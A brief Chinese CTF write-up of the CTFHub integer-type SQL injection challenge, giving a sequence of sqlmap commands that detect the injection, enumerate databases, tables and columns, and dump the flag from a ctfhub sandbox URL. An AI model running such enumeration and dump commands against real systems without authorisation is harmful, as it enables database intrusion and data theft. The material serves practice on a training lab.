CTFHUB WEB-SQL注入-整数型注入

1.题目

2.使用的环境及工具

环境：kail linux

工具：sqlmap

3.操作步骤

本题是基于sql的注入，首先考虑sqlmap，先查看这个sql是否存在注入

~~~sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1      

 

检查一下全部数据库内容

sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com:10800/?id=1 --dbs

 

 返回值有四个，但是除了sqli，其他都是配置，所以重点在sqli上

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

 

 发现表了之后访问sqli的所有列

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

 

 最后读取flag的值

sqlmap -u http://challenge-a7369d59e66383b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump